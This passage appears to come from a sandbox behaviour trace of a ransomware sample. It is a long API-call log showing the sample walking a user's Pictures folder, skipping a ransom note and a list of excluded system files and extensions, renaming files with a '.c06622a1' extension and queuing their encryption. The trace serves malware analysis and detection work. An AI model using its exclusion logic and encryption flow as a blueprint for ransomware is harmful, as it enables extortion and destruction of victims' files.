BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\AMFkbPo.jpg", dwFileAttributes=0x80) returned 1 [0167.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\AMFkbPo.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\amfkbpo.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0167.255] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.255] ReadFile (in: hFile=0x1ec, lpBuffer=0x32e224, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e2b4, lpOverlapped=0x0 | out: lpBuffer=0x32e224*, lpNumberOfBytesRead=0x32e2b4*=0x90, lpOverlapped=0x0) returned 1 [0167.256] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e224, Length=0x80) returned 0xb9d15fc0 [0167.256] RtlComputeCrc32 (PartialCrc=0x5fc0, Buffer=0x32e224, Length=0x80) returned 0xcac94239 [0167.256] RtlComputeCrc32 (PartialCrc=0x4239, Buffer=0x32e224, Length=0x80) returned 0xacac875b [0167.256] RtlComputeCrc32 (PartialCrc=0x875b, Buffer=0x32e224, Length=0x80) returned 0xf9e60cc [0167.256] RtlComputeCrc32 (PartialCrc=0x60cc, Buffer=0x32e224, Length=0x80) returned 0xd0cd54c4 [0167.256] CloseHandle (hObject=0x1ec) returned 1 [0167.256] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32f20b8 [0167.257] wcscpy (in: _Dest=0x32f20b8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\AMFkbPo.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\AMFkbPo.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\AMFkbPo.jpg" [0167.257] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\AMFkbPo.jpg") returned 0x5e [0167.257] wcscpy (in: _Dest=0x32f2174, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.257] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\AMFkbPo.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\amfkbpo.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\AMFkbPo.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\amfkbpo.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\AMFkbPo.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\amfkbpo.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ec [0167.264] CreateIoCompletionPort (FileHandle=0x1ec, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.264] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0167.270] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f65e971 [0167.270] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d377092 [0167.270] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x612e4ac1 [0167.270] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4549b7da [0167.270] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x59bf726e [0167.270] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x537cd503 [0167.270] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x662a4a36 [0167.270] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x37410556 [0167.273] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0xb7561eaa [0167.273] RtlComputeCrc32 (PartialCrc=0x1eaa, Buffer=0x710094, Length=0x80) returned 0xb93a0e1b [0167.273] RtlComputeCrc32 (PartialCrc=0xe1b, Buffer=0x710094, Length=0x80) returned 0xfedd271e [0167.273] RtlComputeCrc32 (PartialCrc=0x271e, Buffer=0x710094, Length=0x80) returned 0xd3885bf9 [0167.273] RtlComputeCrc32 (PartialCrc=0x5bf9, Buffer=0x710094, Length=0x80) returned 0xf00e3f51 [0167.273] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.273] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32e20b0) returned 1 [0167.273] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32f20b8) returned 1 [0167.273] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41dfff70, ftCreationTime.dwHighDateTime=0x1d5de95, ftLastAccessTime.dwLowDateTime=0xabdc750, ftLastAccessTime.dwHighDateTime=0x1d5d8d9, ftLastWriteTime.dwLowDateTime=0xabdc750, ftLastWriteTime.dwHighDateTime=0x1d5d8d9, nFileSizeHigh=0x0, nFileSizeLow=0x3d4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="KhOH.jpg", cAlternateFileName="")) returned 1 [0167.273] _wcsicmp (_Str1="KhOH.jpg", _Str2="README.c06622a1.TXT") returned -7 [0167.273] wcsstr (_Str="KhOH.jpg", _SubStr="README") returned 0x0 [0167.273] _wcsicmp (_Str1="autorun.inf", _Str2="KhOH.jpg") returned -10 [0167.273] wcslen (_String="autorun.inf") returned 0xb [0167.273] _wcsicmp (_Str1="boot.ini", _Str2="KhOH.jpg") returned -9 [0167.274] wcslen (_String="boot.ini") returned 0x8 [0167.274] _wcsicmp (_Str1="bootfont.bin", _Str2="KhOH.jpg") returned -9 [0167.274] wcslen (_String="bootfont.bin") returned 0xc [0167.274] _wcsicmp (_Str1="bootsect.bak", _Str2="KhOH.jpg") returned -9 [0167.274] wcslen (_String="bootsect.bak") returned 0xc [0167.274] _wcsicmp (_Str1="desktop.ini", _Str2="KhOH.jpg") returned -7 [0167.274] wcslen (_String="desktop.ini") returned 0xb [0167.274] _wcsicmp (_Str1="iconcache.db", _Str2="KhOH.jpg") returned -2 [0167.274] wcslen (_String="iconcache.db") returned 0xc [0167.274] _wcsicmp (_Str1="ntldr", _Str2="KhOH.jpg") returned 3 [0167.274] wcslen (_String="ntldr") returned 0x5 [0167.274] _wcsicmp (_Str1="ntuser.dat", _Str2="KhOH.jpg") returned 3 [0167.274] wcslen (_String="ntuser.dat") returned 0xa [0167.274] _wcsicmp (_Str1="ntuser.dat.log", _Str2="KhOH.jpg") returned 3 [0167.274] wcslen (_String="ntuser.dat.log") returned 0xe [0167.274] _wcsicmp (_Str1="ntuser.ini", _Str2="KhOH.jpg") returned 3 [0167.274] wcslen (_String="ntuser.ini") returned 0xa [0167.274] _wcsicmp (_Str1="thumbs.db", _Str2="KhOH.jpg") returned 9 [0167.274] wcslen (_String="thumbs.db") returned 0x9 [0167.274] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.274] wcslen (_String="386") returned 0x3 [0167.274] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.274] wcslen (_String="adv") returned 0x3 [0167.274] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.274] wcslen (_String="ani") returned 0x3 [0167.274] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.274] wcslen (_String="bat") returned 0x3 [0167.274] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.274] wcslen (_String="bin") returned 0x3 [0167.274] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.274] wcslen (_String="cab") returned 0x3 [0167.274] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.274] wcslen (_String="cmd") returned 0x3 [0167.275] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.275] wcslen (_String="com") returned 0x3 [0167.275] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.275] wcslen (_String="cpl") returned 0x3 [0167.275] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.275] wcslen (_String="cur") returned 0x3 [0167.275] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.275] wcslen (_String="deskthemepack") returned 0xd [0167.275] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.275] wcslen (_String="diagcab") returned 0x7 [0167.275] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.275] wcslen (_String="diagcfg") returned 0x7 [0167.275] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.275] wcslen (_String="diagpkg") returned 0x7 [0167.275] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.275] wcslen (_String="dll") returned 0x3 [0167.275] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.275] wcslen (_String="drv") returned 0x3 [0167.275] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.275] wcslen (_String="exe") returned 0x3 [0167.275] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.275] wcslen (_String="hlp") returned 0x3 [0167.275] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.275] wcslen (_String="icl") returned 0x3 [0167.275] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.275] wcslen (_String="icns") returned 0x4 [0167.275] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.275] wcslen (_String="ico") returned 0x3 [0167.275] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.275] wcslen (_String="ics") returned 0x3 [0167.275] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.275] wcslen (_String="idx") returned 0x3 [0167.275] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.275] wcslen (_String="ldf") returned 0x3 [0167.276] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.276] wcslen (_String="lnk") returned 0x3 [0167.276] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.276] wcslen (_String="mod") returned 0x3 [0167.276] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.276] wcslen (_String="mpa") returned 0x3 [0167.276] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.276] wcslen (_String="msc") returned 0x3 [0167.276] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.276] wcslen (_String="msp") returned 0x3 [0167.276] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.276] wcslen (_String="msstyles") returned 0x8 [0167.276] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.276] wcslen (_String="msu") returned 0x3 [0167.276] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.276] wcslen (_String="nls") returned 0x3 [0167.276] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.276] wcslen (_String="nomedia") returned 0x7 [0167.276] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.276] wcslen (_String="ocx") returned 0x3 [0167.276] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.276] wcslen (_String="prf") returned 0x3 [0167.276] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.276] wcslen (_String="ps1") returned 0x3 [0167.276] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.276] wcslen (_String="rom") returned 0x3 [0167.276] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.276] wcslen (_String="rtp") returned 0x3 [0167.276] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.276] wcslen (_String="scr") returned 0x3 [0167.276] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.276] wcslen (_String="shs") returned 0x3 [0167.276] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.276] wcslen (_String="spl") returned 0x3 [0167.277] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.277] wcslen (_String="sys") returned 0x3 [0167.277] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.277] wcslen (_String="theme") returned 0x5 [0167.277] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.277] wcslen (_String="themepack") returned 0x9 [0167.277] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.277] wcslen (_String="wpx") returned 0x3 [0167.277] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.277] wcslen (_String="lock") returned 0x4 [0167.277] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.277] wcslen (_String="key") returned 0x3 [0167.277] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.277] wcslen (_String="hta") returned 0x3 [0167.277] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.277] wcslen (_String="msi") returned 0x3 [0167.277] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.277] wcslen (_String="pdb") returned 0x3 [0167.277] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.277] wcslen (_String="sqlite") returned 0x6 [0167.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_")) returned 0x10 [0167.277] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32e20b0 [0167.277] wcscpy (in: _Dest=0x32e20b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" [0167.277] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_") returned 0x52 [0167.277] wcscpy (in: _Dest=0x32e2156, _Source="KhOH.jpg" | out: _Dest="KhOH.jpg") returned="KhOH.jpg" [0167.277] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\KhOH.jpg", dwFileAttributes=0x80) returned 1 [0167.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\KhOH.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\khoh.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0167.278] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.278] ReadFile (in: hFile=0x1e4, lpBuffer=0x32e224, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e2b4, lpOverlapped=0x0 | out: lpBuffer=0x32e224*, lpNumberOfBytesRead=0x32e2b4*=0x90, lpOverlapped=0x0) returned 1 [0167.279] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e224, Length=0x80) returned 0x3c6d6c42 [0167.279] RtlComputeCrc32 (PartialCrc=0x6c42, Buffer=0x32e224, Length=0x80) returned 0x3c9f159c [0167.279] RtlComputeCrc32 (PartialCrc=0x159c, Buffer=0x32e224, Length=0x80) returned 0x949c8e06 [0167.279] RtlComputeCrc32 (PartialCrc=0x8e06, Buffer=0x32e224, Length=0x80) returned 0xd537dea0 [0167.279] RtlComputeCrc32 (PartialCrc=0xdea0, Buffer=0x32e224, Length=0x80) returned 0x1f66b7e2 [0167.279] CloseHandle (hObject=0x1e4) returned 1 [0167.279] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32f20b8 [0167.279] wcscpy (in: _Dest=0x32f20b8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\KhOH.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\KhOH.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\KhOH.jpg" [0167.279] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\KhOH.jpg") returned 0x5b [0167.279] wcscpy (in: _Dest=0x32f216e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.279] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\KhOH.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\khoh.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\KhOH.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\khoh.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\KhOH.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\khoh.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e4 [0167.282] CreateIoCompletionPort (FileHandle=0x1e4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.282] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0167.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x135af25d [0167.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x25fea2f8 [0167.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2460b5af [0167.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e7fccfb [0167.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x718e353d [0167.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb9ff86 [0167.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6b329ce1 [0167.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5c5b2fe7 [0167.294] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xf8fa7742 [0167.294] RtlComputeCrc32 (PartialCrc=0x7742, Buffer=0x2690094, Length=0x80) returned 0x66eb40c8 [0167.294] RtlComputeCrc32 (PartialCrc=0x40c8, Buffer=0x2690094, Length=0x80) returned 0x56e2b47a [0167.294] RtlComputeCrc32 (PartialCrc=0xb47a, Buffer=0x2690094, Length=0x80) returned 0x664fea8d [0167.294] RtlComputeCrc32 (PartialCrc=0xea8d, Buffer=0x2690094, Length=0x80) returned 0xd17db5fc [0167.294] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0167.294] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32e20b0) returned 1 [0167.294] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32f20b8) returned 1 [0167.294] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x512766e0, ftCreationTime.dwHighDateTime=0x1d5db24, ftLastAccessTime.dwLowDateTime=0x55b3a2c0, ftLastAccessTime.dwHighDateTime=0x1d5ddb6, ftLastWriteTime.dwLowDateTime=0x55b3a2c0, ftLastWriteTime.dwHighDateTime=0x1d5ddb6, nFileSizeHigh=0x0, nFileSizeLow=0xadae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTfAnkz2mAL.jpg", cAlternateFileName="MTFANK~1.JPG")) returned 1 [0167.294] _wcsicmp (_Str1="MTfAnkz2mAL.jpg", _Str2="README.c06622a1.TXT") returned -5 [0167.294] wcsstr (_Str="MTfAnkz2mAL.jpg", _SubStr="README") returned 0x0 [0167.295] _wcsicmp (_Str1="autorun.inf", _Str2="MTfAnkz2mAL.jpg") returned -12 [0167.295] wcslen (_String="autorun.inf") returned 0xb [0167.295] _wcsicmp (_Str1="boot.ini", _Str2="MTfAnkz2mAL.jpg") returned -11 [0167.295] wcslen (_String="boot.ini") returned 0x8 [0167.295] _wcsicmp (_Str1="bootfont.bin", _Str2="MTfAnkz2mAL.jpg") returned -11 [0167.295] wcslen (_String="bootfont.bin") returned 0xc [0167.295] _wcsicmp (_Str1="bootsect.bak", _Str2="MTfAnkz2mAL.jpg") returned -11 [0167.295] wcslen (_String="bootsect.bak") returned 0xc [0167.295] _wcsicmp (_Str1="desktop.ini", _Str2="MTfAnkz2mAL.jpg") returned -9 [0167.295] wcslen (_String="desktop.ini") returned 0xb [0167.295] _wcsicmp (_Str1="iconcache.db", _Str2="MTfAnkz2mAL.jpg") returned -4 [0167.295] wcslen (_String="iconcache.db") returned 0xc [0167.295] _wcsicmp (_Str1="ntldr", _Str2="MTfAnkz2mAL.jpg") returned 1 [0167.295] wcslen (_String="ntldr") returned 0x5 [0167.295] _wcsicmp (_Str1="ntuser.dat", _Str2="MTfAnkz2mAL.jpg") returned 1 [0167.295] wcslen (_String="ntuser.dat") returned 0xa [0167.295] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MTfAnkz2mAL.jpg") returned 1 [0167.295] wcslen (_String="ntuser.dat.log") returned 0xe [0167.295] _wcsicmp (_Str1="ntuser.ini", _Str2="MTfAnkz2mAL.jpg") returned 1 [0167.295] wcslen (_String="ntuser.ini") returned 0xa [0167.295] _wcsicmp (_Str1="thumbs.db", _Str2="MTfAnkz2mAL.jpg") returned 7 [0167.295] wcslen (_String="thumbs.db") returned 0x9 [0167.295] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.295] wcslen (_String="386") returned 0x3 [0167.295] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.295] wcslen (_String="adv") returned 0x3 [0167.295] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.295] wcslen (_String="ani") returned 0x3 [0167.295] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.295] wcslen (_String="bat") returned 0x3 [0167.295] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.295] wcslen (_String="bin") returned 0x3 [0167.295] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.296] wcslen (_String="cab") returned 0x3 [0167.296] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.296] wcslen (_String="cmd") returned 0x3 [0167.296] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.296] wcslen (_String="com") returned 0x3 [0167.296] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.296] wcslen (_String="cpl") returned 0x3 [0167.296] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.296] wcslen (_String="cur") returned 0x3 [0167.296] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.296] wcslen (_String="deskthemepack") returned 0xd [0167.296] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.296] wcslen (_String="diagcab") returned 0x7 [0167.296] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.296] wcslen (_String="diagcfg") returned 0x7 [0167.296] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.296] wcslen (_String="diagpkg") returned 0x7 [0167.296] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.296] wcslen (_String="dll") returned 0x3 [0167.296] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.296] wcslen (_String="drv") returned 0x3 [0167.296] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.296] wcslen (_String="exe") returned 0x3 [0167.296] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.296] wcslen (_String="hlp") returned 0x3 [0167.296] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.296] wcslen (_String="icl") returned 0x3 [0167.296] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.296] wcslen (_String="icns") returned 0x4 [0167.296] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.296] wcslen (_String="ico") returned 0x3 [0167.296] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.297] wcslen (_String="ics") returned 0x3 [0167.297] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.297] wcslen (_String="idx") returned 0x3 [0167.297] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.297] wcslen (_String="ldf") returned 0x3 [0167.297] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.297] wcslen (_String="lnk") returned 0x3 [0167.297] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.297] wcslen (_String="mod") returned 0x3 [0167.297] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.297] wcslen (_String="mpa") returned 0x3 [0167.297] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.297] wcslen (_String="msc") returned 0x3 [0167.297] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.297] wcslen (_String="msp") returned 0x3 [0167.297] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.297] wcslen (_String="msstyles") returned 0x8 [0167.297] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.297] wcslen (_String="msu") returned 0x3 [0167.297] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.297] wcslen (_String="nls") returned 0x3 [0167.297] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.297] wcslen (_String="nomedia") returned 0x7 [0167.297] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.297] wcslen 